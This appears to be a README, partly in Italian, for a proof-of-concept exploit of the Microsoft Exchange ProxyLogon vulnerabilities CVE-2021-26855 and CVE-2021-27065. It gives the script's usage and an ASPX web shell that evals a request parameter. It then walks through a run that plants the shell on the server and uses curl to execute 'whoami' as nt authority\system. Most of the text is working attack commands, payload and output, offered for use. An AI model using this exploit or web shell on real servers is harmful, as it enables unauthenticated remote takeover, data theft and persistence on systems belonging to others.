
Exploit proof-of-concept per CVE-2021-26855 e CVE-2021-27065. RCE non autenticata su Exchange.
Exploit proof-of-concept per CVE-2021-26855 e CVE-2021-27065, che consente l'esecuzione remota di codice non autenticata su Microsoft Exchange come descritto nelle seguenti risorse:
Lo sfruttamento richiede la conoscenza dell'URL del server Exchange frontend (ad es. https://exchange.example.org) e un indirizzo email per un utente sul sistema. L'SID dell'amministratore e il backend possono essere divulgati dal server.
$ python exploit.py -h
usage: exploit.py [-h] [--frontend FRONTEND] [--email EMAIL] [--sid SID]
[--webshell WEBSHELL] [--path PATH]
[--backend BACKEND]
[--proxy PROXY]
proxylogon proof-of-concept
optional arguments:
-h, --help show this help message and exit
--frontend FRONTEND external url to exchange (e.g. https://exchange.example.org)
--email EMAIL valid email on the target machine
--sid SID exchange admin sid
--webshell WEBSHELL webshell to upload
--path PATH desired path to webshell on host
--backend BACKEND [optional] backend host (leaked in X-CalculatedBETarget)
--proxy PROXY [optional] proxy traffic (e.g. http://127.0.0.1:8080)
$ cat <<EOF > webshell.aspx
<script language="JScript" runat="server">
function Page_Load(){
eval(Request["kxpprfgvnosz"],"unsafe");
}
</script>
EOF
$ python exploit.py --frontend https://172.16.59.7 --backend exchange.hafnium.local \
--email [email protected] \
--webshell webshell.aspx \
--path 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\o.aspx'
Retrieving backend via RPC
Backend: exchange.corp.contoso.com
Identified SID: S-1-5-21-...-500
Admin SID: S-1-5-21-...-500
Authenticating via proxylogon
Looking up OAB virtual directory
OAB virtual directory: OAB (Default Web Site)
Injecting payload into OAB ExternalUrl
Resetting OAB virtual directory
Enjoy your webshell!
$ curl -s -k https://172.16.59.7/ecp/auth/o.aspx \
-d 'kxpprfgvnosz=Response.Write(
new ActiveXObject("WScript.Shell")
.Exec("cmd /c whoami")
.StdOut
.ReadAll()
);' | head -n 1
nt authority\system